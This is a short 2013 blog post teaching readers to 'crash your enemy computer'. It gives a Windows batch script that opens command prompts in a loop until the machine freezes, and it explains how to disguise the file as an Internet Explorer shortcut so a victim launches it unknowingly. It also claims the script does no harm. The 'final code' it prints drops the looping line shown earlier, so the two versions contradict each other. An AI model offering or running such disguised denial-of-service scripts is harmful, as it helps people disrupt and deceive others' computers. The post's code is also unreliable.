Breaking

Monday, 9 September 2013

How to crash your enemy computer

As usual we will begin by opening notepad. What this script will do is open command prompt six times then continuously loop so it will continue to open command prompt continuously until the computer freezes up or is turned off, this will not to any harm to the computer. 

This is one of the most simple scripts ever. Just type 

start 
start 
start 
start 
start 
start 
start crash 



Then save the file as a batch file by putting .bat at the end of the file name while saving. 
You will have to save the file name as crash.bat unless you change the bottom line of the script to a different name like 

start launch 

or whatever just if you wanna name the file something else change the last line of the code to something else. 

Also if you want to make it more fun create a shortcut to your batch file, you can name the shortuc whatever you want, then right click on the shortcut go to properties then go to change icon, you can make the icon internet explorer and name the shortcut internet explorer. 

To make this even more believeable at the top of the script above the first start you can put these two lines 

@echo off 
start C:\Program Files\Internet Explorer\iexplore.exe 

So your final code would look like this 

@echo off 
start C:\Program Files\Internet Explorer\iexplore.exe 
start 
start 
start 
start 
start 
start 


***************************************HACKER MANISH **************************************************************

comment and njoy osum hacks

No comments:

Post a Comment